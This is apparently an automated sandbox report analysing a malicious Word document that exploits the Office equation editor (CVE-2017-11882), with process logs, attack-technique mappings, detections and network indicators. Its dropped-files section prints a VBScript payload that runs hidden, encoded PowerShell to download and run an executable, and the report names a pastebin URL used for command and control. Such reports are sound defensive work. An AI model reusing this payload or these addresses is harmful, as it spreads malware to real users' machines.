Source: C:\Windows\System32\mmc.exeMemory allocated: 42A0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\System32\mmc.exeMemory allocated: 62D0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\System32\mmc.exeMemory allocated: 4040000 memory commit | memory reserve | memory write watch
Source: C:\Windows\System32\mmc.exeMemory allocated: 26F0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\System32\mmc.exeMemory allocated: 2870000 memory commit | memory reserve | memory write watch
Source: C:\Windows\System32\mmc.exeMemory allocated: 2930000 memory commit | memory reserve | memory write watch
Source: C:\Windows\System32\mmc.exeMemory allocated: 6680000 memory commit | memory reserve | memory write watch
Source: C:\Windows\System32\taskmgr.exeWindow / User API: foregroundWindowGot 401Jump to behavior
Source: C:\Windows\System32\taskmgr.exeWindow / User API: foregroundWindowGot 473Jump to behavior
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 924Jump to behavior
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 2494Jump to behavior
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 898Jump to behavior
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 2625Jump to behavior
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 861
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 2702
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 2728
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 866
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 2578
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 867
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 824
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 2356
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 773
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 2322
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 857
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 2155
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 765
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 2128
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 794
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 1973
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 740
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 1989
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 780
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 1767
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 737
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 1509
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 1711
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 676
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 1571
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 662
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 646
Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 1496
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3388Thread sleep time: -300000s >= -30000sJump to behavior
Source: C:\Windows\System32\mmc.exe TID: 4064Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Windows\System32\mmc.exe TID: 2964Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\mmc.exe TID: 660Thread sleep count: 898 > 30Jump to behavior
Source: C:\Windows\System32\mmc.exe TID: 660Thread sleep count: 2625 > 30Jump to behavior
Source: C:\Windows\System32\mmc.exe TID: 300Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 2864Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 3080Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 1780Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 520Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 3592Thread sleep count: 773 > 30
Source: C:\Windows\System32\mmc.exe TID: 3592Thread sleep count: 2322 > 30
Source: C:\Windows\System32\mmc.exe TID: 1864Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 2520Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 3596Thread sleep count: 765 > 30
Source: C:\Windows\System32\mmc.exe TID: 3596Thread sleep count: 2128 > 30
Source: C:\Windows\System32\mmc.exe TID: 628Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 2032Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 1876Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 3680Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 3832Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 3792Thread sleep count: 1711 > 30
Source: C:\Windows\System32\mmc.exe TID: 3792Thread sleep count: 676 > 30
Source: C:\Windows\System32\mmc.exe TID: 1560Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 2772Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts23
Exploitation for Client Execution
1
DLL Side-Loading
11
Process Injection
1
Masquerading
OS Credential Dumping2
Virtualization/Sandbox Evasion
Remote Services1
Email Collection
1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Modify Registry
LSASS Memory1
Application Window Discovery
Remote Desktop Protocol1
Clipboard Data
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Virtualization/Sandbox Evasion
Security Account Manager1
Remote System Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets13
System Information Discovery
SSHKeylogging13
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Install Root Certificate
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1532551 Sample: test.doc Startdate: 13/10/2024 Architecture: WINDOWS Score: 92 34 Suricata IDS alerts for network traffic 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus / Scanner detection for submitted sample 2->38 40 4 other signatures 2->40 7 WINWORD.EXE 6 8 2->7         started        process3 file4 28 C:\Users\user\Desktop\~$test.doc, data 7->28 dropped 10 EQNEDT32.EXE 10 7->10         started        14 taskmgr.exe 7->14         started        16 taskmgr.exe 7->16         started        18 15 other processes 7->18 process5 dnsIp6 30 pastebin.com 10->30 32 pastebin.com 104.20.4.235, 443, 49161 CLOUDFLARENETUS United States 10->32 42 Installs new ROOT certificates 10->42 44 Office equation editor establishes network connection 10->44 20 mmc.exe 4 18 14->20         started        22 mmc.exe 18 14->22         started        24 mmc.exe 14->24         started        26 13 other processes 14->26 signatures7 46 Connects to a pastebin service (likely for C&C) 30->46 process8

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
test.doc64%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
test.doc57%VirustotalBrowse
test.doc100%AviraHEUR/Rtf.Malformed
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
pastebin.com0%VirustotalBrowse
SourceDetectionScannerLabelLink
http://crl.entrust.net/server1.crl00%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
https://secure.comodo.com/CPS00%URL Reputationsafe
http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
https://pastebin.com/0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
pastebin.com
104.20.4.235
truetrueunknown
NameMaliciousAntivirus DetectionReputation
https://pastebin.com/raw/JtdAmHD5true
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://pastebin.com/raw/JtdAmHD5PyEQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://pastebin.com/raw/JtdAmHD5598B1687EQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://pastebin.com/raw/JtdAmHD556zEQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://pastebin.com/raw/JtdAmHD5edEQNEDT32.EXE, 00000002.00000002.1530889300.00000000008F0000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://pastebin.com/raw/JtdAmHD5:EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://pastebin.com/raw/JtdAmHD5...mpoqEQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://pastebin.com/raw/JtdAmHD5dyEQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://pastebin.com/raw/JtdAmHD5...EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://pastebin.com/EQNEDT32.EXE, 00000002.00000002.1530889300.000000000097D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    104.20.4.235
                    pastebin.comUnited States
                    13335CLOUDFLARENETUStrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1532551
                    Start date and time:2024-10-13 17:14:09 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 16m 19s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:40
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:test.doc
                    Detection:MAL
                    Classification:mal92.troj.expl.winDOC@103/6@1/1
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 67
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .doc
                    • Max analysis timeout: 600s exceeded, the analysis took too long
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 3368 because there are no executed function
                    • Execution Graph export aborted for target mmc.exe, PID 1860 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 1996 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 2124 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 2316 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 2664 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 2996 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 3068 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 3448 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 3464 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 3508 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 3576 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 3588 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 3784 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 3872 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 4028 because it is empty
                    • Execution Graph export aborted for target mmc.exe, PID 4060 because it is empty
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    TimeTypeDescription
                    11:15:04API Interceptor2336x Sleep call for process: EQNEDT32.EXE modified
                    11:16:04API Interceptor6170x Sleep call for process: taskmgr.exe modified
                    11:16:12API Interceptor8559x Sleep call for process: mmc.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.20.4.235sostener.vbsGet hashmaliciousNjratBrowse
                    • pastebin.com/raw/V9y5Q5vv
                    sostener.vbsGet hashmaliciousXWormBrowse
                    • pastebin.com/raw/V9y5Q5vv
                    envifa.vbsGet hashmaliciousRemcosBrowse
                    • pastebin.com/raw/V9y5Q5vv
                    New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                    • pastebin.com/raw/NsQ5qTHr
                    Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                    • pastebin.com/raw/NsQ5qTHr
                    Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                    • pastebin.com/raw/NsQ5qTHr
                    Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                    • pastebin.com/raw/NsQ5qTHr
                    Update on Payment.jsGet hashmaliciousWSHRATBrowse
                    • pastebin.com/raw/NsQ5qTHr
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    pastebin.cominvoice.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                    • 104.20.3.235
                    awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                    • 172.67.19.24
                    egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                    • 172.67.19.24
                    Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                    • 104.20.4.235
                    eshkere.batGet hashmaliciousXmrigBrowse
                    • 104.20.4.235
                    frik.exeGet hashmaliciousXmrigBrowse
                    • 104.20.3.235
                    Google Chrome.exeGet hashmaliciousXmrigBrowse
                    • 172.67.19.24
                    SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                    • 104.20.4.235
                    SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                    • 172.67.19.24
                    SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                    • 172.67.19.24
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                    • 104.21.53.8
                    file.exeGet hashmaliciousLummaCBrowse
                    • 172.67.206.204
                    file.exeGet hashmaliciousLummaCBrowse
                    • 172.67.206.204
                    Setup.exeGet hashmaliciousLummaCBrowse
                    • 172.67.206.204
                    Setup.exeGet hashmaliciousLummaCBrowse
                    • 172.67.206.204
                    file.exeGet hashmaliciousLummaCBrowse
                    • 104.21.53.8
                    Set-up.exeGet hashmaliciousLummaCBrowse
                    • 104.21.77.78
                    file.exeGet hashmaliciousLummaCBrowse
                    • 172.67.206.204
                    SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                    • 104.18.11.89
                    file.exeGet hashmaliciousLummaCBrowse
                    • 104.21.53.8
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    7dcce5b76c8b17472d024758970a406bPO-00006799868.xlsGet hashmaliciousRemcosBrowse
                    • 104.20.4.235
                    STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                    • 104.20.4.235
                    QKnj2Wb3yo.xlsxGet hashmaliciousHidden Macro 4.0Browse
                    • 104.20.4.235
                    KjFT0qPTo4.vbsGet hashmaliciousFormBookBrowse
                    • 104.20.4.235
                    Quotation_398893.xlam.xlsxGet hashmaliciousUnknownBrowse
                    • 104.20.4.235
                    Documentosrs.ppamGet hashmaliciousRevengeRATBrowse
                    • 104.20.4.235
                    PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                    • 104.20.4.235
                    COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                    • 104.20.4.235
                    Ordin de plat#U0103.docx.docGet hashmaliciousUnknownBrowse
                    • 104.20.4.235
                    COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                    • 104.20.4.235
                    No context
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:HTML document, ASCII text, with very long lines (324), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1500
                    Entropy (8bit):5.412385328672839
                    Encrypted:false
                    SSDEEP:24:8gSLK2x4bYq3tEElVfua3LlK90VA9FndAKdxn31AnRvIBSaFd07DWyACaZTFKe5X:USZlMndNFSazkqScTnsoiHiKNnMK2
                    MD5:565EF83DAFF3937B5039C67C82AE15CB
                    SHA1:2E80B8D494C6A863C42598CF8283F71FD5CFCE36
                    SHA-256:19F9A121FB829A19B5A515ABC1AEBE7BE340592E4D3B6851DB8D97218255879A
                    SHA-512:3C8FE6102BBD9E96A9B31DD2545E5A40A4DFD2DA2B7269C3C283BAE1070EAE4C0B0228A26F7504E059A1E2FB683FFAFFD812BC17D8E36B20CF2B5F13FA54B1E7
                    Malicious:false
                    Preview:<script language="VBScript">.. Function var_Beinjaman().. Dim Dunjalar1212....Dim Dunjalar12121....Dim Dunjalar12122....Dim Dunjalar12123....Dim Dunjalar12124.. Set Dunjalar1212 = CreateObject("Wscript.Shell")....Dim Dunjalar12125....Dim Dunjalar12126....Dim Dunjalar12127....Dim Dunjalar12128....temp = Dunjalar1212.expandEnvironmentStrings("%temp%")....Dim Dunjalar12129....Dim Dunjalar121210....Dim Dunjalar121211....Dim Dunjalar121212....Dim Dunjalar121213....Dim Dunjalar121214.. Dunjalar1212.run "powershell -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwAHMAOgAvAC8AdgBvAGwAMgAuAHAAdwAvAG4AaQB0AGEAbAAuAGUAeABlACIALAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAYgBhAGsAZAByAGEAdwAuAGUAeABlACIAKQApADsA", 0, true....Dim Dunjalar121215....Dim Dunjalar121216....Dim Dunjalar121217....Dim Dunjalar121218...End Function...Sub window_onload...const impersonation = 3...Const HIDDEN_WINDOW = 1
                    Process:C:\Windows\System32\mmc.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):1835
                    Entropy (8bit):4.8246355222783786
                    Encrypted:false
                    SSDEEP:48:1QuIGYwCQ73ZOaFibdMpn1c2CqWMwr8Qp5lAh:SncJO8ZDru9S
                    MD5:BEE1758A485085BB8A121EB74BA7E96F
                    SHA1:8024492E1126B17F832E36C932D433200180B693
                    SHA-256:EDCAD5B1CE8A304B70B8C9EA57D4AEAB740D979FFA59243B943011CB1BA4D57E
                    SHA-512:BB1FE94A523EF108C49F75DA187FCC28BBF80D72233454C329134BEE2E12268D3DA344A622987B081612AA2A1EDAC8B91EEF27619C7309517AC52E7AEBF32F1A
                    Malicious:false
                    Preview:..function OnLoad()..{.. ViewPanel.addBehavior("#default#mmcview");.. MMCEvents.ConnectTo(external.Document.Application);.. UpdateState();..}....// Prevent text from being selected and messing up the UI...function document.onselectstart()..{.. event.returnValue = false;..}....function UpdateState()..{.. var strDetails = "";.. var strDisplayName = "";.. var strDescription = "";.. var i;.. var curnode;.. var strNodeType;.... N = external.Selection;.... switch(N.count).. {.. case 0:.. DisplayNameElem.style.fontWeight="normal";.. strDetails = "";.. strDisplayName = L_strNoItemSelected_Text;.. break;.... case 1:.. DisplayNameElem.style.fontWeight="bold";.. strDetails = "";.. curNode = N(1);.... // got the selected node.. strNodeType = curNode.Nodetype;.. strDisplayName = external.CellContents(curNode, 1);.. strDescription = curNode.Property("CCF_DESCRIPTION");..
                    Process:C:\Windows\System32\mmc.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):1835
                    Entropy (8bit):4.8246355222783786
                    Encrypted:false
                    SSDEEP:48:1QuIGYwCQ73ZOaFibdMpn1c2CqWMwr8Qp5lAh:SncJO8ZDru9S
                    MD5:BEE1758A485085BB8A121EB74BA7E96F
                    SHA1:8024492E1126B17F832E36C932D433200180B693
                    SHA-256:EDCAD5B1CE8A304B70B8C9EA57D4AEAB740D979FFA59243B943011CB1BA4D57E
